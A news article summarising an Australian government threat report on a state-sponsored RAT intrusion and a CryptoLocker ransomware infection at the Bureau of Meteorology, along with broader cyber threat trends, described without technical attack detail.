Foreign spies used RAT to hack Australian weather bureau with weak security controls

Foreign spies used RAT to hack Australian weather bureau with weak security controls
Credit: U.S. Air Force photo by Edward Aspera Jr.

Foreign spies made off with an “unknown quantity of documents” after infecting Australia’s meteorology bureau with a RAT, but the fact that security controls at the bureau were “insufficient” even for common cybercrime threats only helped the “state-sponsored cyber adversaries.”

After Australia’s Bureau of Meteorology systems was hacked, unnamed government officials immediately blamed China and China immediately denied the “groundless accusations.” When the hack hit the news in December 2015, the Bureau of Meteorology (BOM) would not confirm if its systems had been compromised. In April, Australian’s Prime Minister did confirm there had been a “significant cyber intrusion” at the Bureau.

Now there’s more information available via a threat report (pdf) released by the Australian Cyber Security Center (ACSC).

Back in 2015, investigators at the Australian Signals Directorate (ASD) “detected suspicious activity from two computers on the Bureau of Meteorology’s network.” The ASD “identified the presence of particular Remote Access Tool (RAT) malware popular with state-sponsored cyber adversaries, amongst other malware associated with cybercrime. The RAT had also been used to compromise other Australian government networks.”

The 2016 Threat Report revealed that the ASD found a “password dumping utility used by the adversary and identified the malicious use of at least one legitimate domain administrator account.” The “ASD identified at least six further hosts on the Bureau’s network that the adversary attempted to access, including domain controllers and file servers.”

Between the password dumping utilities and complete access to domain controllers, investigators believe “all passwords on the Bureau’s network were already compromised” by the time an investigation was launched. Evidence suggested that attackers used network scanning and time stamp modification tools to analyze network architecture and to help hide the attack tools on hosts.

The ASD found evidence of the attackers “searching for and copying an unknown quantity of documents from the Bureau’s network.” It may seem odd for foreign spies to be so interested in a weather bureau, but China was blamed for the 2014 hack of NOAA (National Oceanic and Atmospheric Administration). Australia’s BOM reportedly has one of the most powerful supercomputers, and it provides data to other government agencies.

Regarding the BOM hack, the report stated:

In this instance, the ACSC attributed the primary compromise to a foreign intelligence service; however, security controls in place were insufficient to protect the network from more common threats associated with cybercrime. CryptoLocker ransomware found on the network represented the most significant threat to the Bureau’s data retention and continuity of operations.

Regarding ransomware, a workstation was infected after a government staffer clicked on an Australia Post-themed email. The PC was then re-imaged. However, it wasn’t until three months later, when files for a legal proceeding were needed, that it was discovered that thousands of files on a server had also been encrypted. With that much time passing, the backups also had been affected by the ransomware and were encrypted. By then, it was too late to pay the ransom.

Trends and increase of other cyber threats

Sophisticated adversaries are fast to add new exploits, such as those that were leaked after the Hacking Team was hacked. The ACSC said to expect “terrorists and hacktivists” to continue targeted disclosures and the dumping of PII (personally identifiable information) “in order to embarrass, intimidate or threaten individuals and organizations.”

The ACSC said it has seen an increase in credential harvesting campaigns, DDoS extortion, malvertising and watering hole attacks, as well as an uptick in systems being exploited via PowerShell and Microsoft Office macros. Additionally, the security experts have seen attackers use in-memory malware—malicious programs stored in memory and never written to disk—to better avoid detection, beat forensics and bypass security controls.

The 2016 Threat Report goes into more details about threats and mitigations, as well as how to prepare for and respond to cybersecurity incidents.

Must read: Hidden Cause of Slow Internet and how to fix it
View Comments
Join the discussion
Be the first to comment on this article. Our Commenting Policies